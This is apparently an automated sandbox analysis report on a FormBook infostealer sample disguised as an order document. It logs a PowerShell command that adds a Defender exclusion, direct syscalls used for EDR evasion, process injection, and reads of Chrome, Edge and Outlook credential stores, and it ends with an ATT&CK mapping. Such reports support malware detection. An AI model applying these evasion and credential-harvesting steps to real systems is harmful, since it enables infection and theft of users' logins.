            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"Jump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeMemory written: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: NULL target: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe protection: execute and read and writeJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeSection loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\compact.exeThread register set: target process: 7156Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\compact.exeThread APC queued: target process: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"Jump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeProcess created: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe "C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe"Jump to behavior
            Source: C:\Program Files (x86)\DmmYnblmJTLDhvgFjbXsIMIesvkaMwNvjRhKKpaFSbEONXnqZBwCbcDNXPDETmxNEAlNU\OFEkXEMCZC.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: OFEkXEMCZC.exe, 0000000A.00000002.4561308017.0000000001291000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000000.2448150210.0000000001290000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4561875080.0000000001301000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: OFEkXEMCZC.exe, 0000000A.00000002.4561308017.0000000001291000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000000.2448150210.0000000001290000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4561875080.0000000001301000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: OFEkXEMCZC.exe, 0000000A.00000002.4561308017.0000000001291000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000000.2448150210.0000000001290000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4561875080.0000000001301000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: OFEkXEMCZC.exe, 0000000A.00000002.4561308017.0000000001291000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000A.00000000.2448150210.0000000001290000.00000002.00000001.00040000.00000000.sdmp, OFEkXEMCZC.exe, 0000000E.00000002.4561875080.0000000001301000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeQueries volume information: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\spec 4008670601 AZTEK Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\compact.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 6.2.spec 4008670601 AZTEK Order.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.4562052256.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4553852142.0000000002DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.4564754025.00000000050C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2525419551.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.4561997871.0000000003570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2526010135.0000000001700000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.4561941727.0000000004890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2527736172.00000000038C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
